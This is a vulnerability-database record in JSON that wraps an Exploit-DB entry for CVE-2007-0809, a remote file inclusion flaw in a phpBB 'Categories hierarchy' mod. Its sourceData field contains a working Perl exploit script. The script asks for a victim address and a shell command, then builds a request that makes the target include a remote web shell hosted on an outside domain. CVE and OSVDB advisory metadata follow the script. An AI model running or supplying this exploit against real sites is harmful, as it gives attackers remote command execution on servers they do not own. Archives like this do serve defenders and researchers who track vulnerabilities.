{"bulletinFamily": "exploit", "id": "EDB-ID:3270", "cvelist": ["CVE-2007-0809"], "modified": "2007-02-05T00:00:00", "lastseen": "2016-01-31T18:06:06", "edition": 1, "sourceData": "# (C) xoron\n#\n# [Name: Categories hierarchy v2.1.2 (phpbb_root_path) Remote File Include Exploit]\n#\n# [Script name: Ptifo mod-CH_212_installed\n#\n# [Author: xoron]\n# [Exploit coded by xoron]\n#\n# [Download: http://sourceforge.net/project/showfiles.php?group_id=125710]\n#\n# [xoron.biz - xoron.info]\n#\n# [Thanx: str0ke, kacper, k1tk4t, SHiKA, can bjorn]\n#\n# [Tesekkurler: chaos, pang0, DJR]\n# \n# [POC: /includes/class_template.php?phpbb_root_path=http://evilscripts?]\n#\n# [Vuln Codes: include($phpbb_root_path . 'includes/template.' . $phpEx); ]\n#\n#\n$rfi = \"class_template.php?phpbb_root_path=\"; \n$path = \"/includes/\";\n$shell = \"http://pang0.by.ru/shall/pang057.zz?cmd=\";\nprint \"Language: English // Turkish\\nPlz Select Lang:\\n\"; $dil = <STDIN>; chop($dil);\nif($dil eq \"English\"){\nprint \"(c) xoron\\n\";\n&ex;\n}\nelsif($dil eq \"Turkish\"){\nprint \"Kodlayan xoron\\n\";\n&ex;\n}\nelse {print \"Plz Select Languge\\n\"; exit;}\nsub ex{\n$not = \"Victim is Not Vunl.\\n\" and $not_cmd = \"Victim is Vunl but Not doing Exec.\\n\"\nand $vic = \"Victim Addres? with start http:// :\" and $thx = \"Greetz \" and $diz = \"Dictionary?:\" and $komt = \"Command?:\"\nif $dil eq \"English\";\n$not = \"Adreste RFI acigi Yok\\n\" and $not_cmd = \"Adresde Ac\u0102\u02ddk Var Fakat Kod Calismiyor\\n\"\nand $vic = \"Ornek Adres http:// ile baslayan:\" and $diz = \"Dizin?: \" and $thx = \"Tesekkurler \" and $komt = \"Command?:\"\nif $dil eq \"Turkish\";\nprint \"$vic\";\n$victim = <STDIN>;\nchop($victim);\nprint \"$diz\";\n$dizn = <STDIN>;\nchop($dizn);\n$dizin = $dizn;\n$dizin = \"/\" if !$dizn;\nprint \"$komt\";\n$cmd = <STDIN>;\nchop($cmd);\n$cmmd = $cmd;\n$cmmd = \"dir\" if !$cmd;\n$site = $victim;\n$site = \"http://$victim\" if !($victim =~ /http/);\n$acacaz = \"$site$dizin$rfi$shell$cmmd\";\nprint \"(c) xoron.info - xoron.biz\\n$thx: pang0, chaos, can bjorn\\n\";\nsleep 3;\nsystem(\"start $acacaz\");\n}\n\n# milw0rm.com [2007-02-05]\n", "published": "2007-02-05T00:00:00", "href": "https://www.exploit-db.com/exploits/3270/", "osvdbidlist": ["33722"], "reporter": "Mehmet Ince", "hash": "1e5cc1098c33e1a4c4190c44a6f08c97802be28e54e529792e72a5c17c7ab9d5", "title": "Categories hierarchy phpBB Mod 2.1.2 phpbb_root_path RFI Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Categories hierarchy phpBB Mod 2.1.2 (phpbb_root_path) RFI Exploit. CVE-2007-0809. Webapps exploit for php platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3270/", "viewCount": 1, "enchantments": {"vulnersScore": 5.4}}

{"result": {"cve": [{"id": "CVE-2007-0809", "type": "cve", "title": "CVE-2007-0809", "description": "PHP remote file inclusion vulnerability in includes/class_template.php in Categories hierarchy (aka CH or mod-CH) 2.1.2 in ptirhiikmods allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "published": "2007-02-07T06:28:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0809", "cvelist": ["CVE-2007-0809"], "lastseen": "2016-09-03T08:25:25"}], "osvdb": [{"id": "OSVDB:33722", "type": "osvdb", "title": "Categories hierarchy includes/class_template.php phpbb_root_path Variable Remote File Inclusion", "description": "# No description provided by the source\n\n## References:\nMail List Post: http://attrition.org/pipermail/vim/2007-February/001285.html\nISS X-Force ID: 32193\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3270\nFrSIRT Advisory: ADV-2007-0493\n[CVE-2007-0809](https://vulners.com/cve/CVE-2007-0809)\nBugtraq ID: 22400\n", "published": "2007-02-05T02:11:46", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:33722", "cvelist": ["CVE-2007-0809"], "lastseen": "2017-04-28T13:20:30"}]}}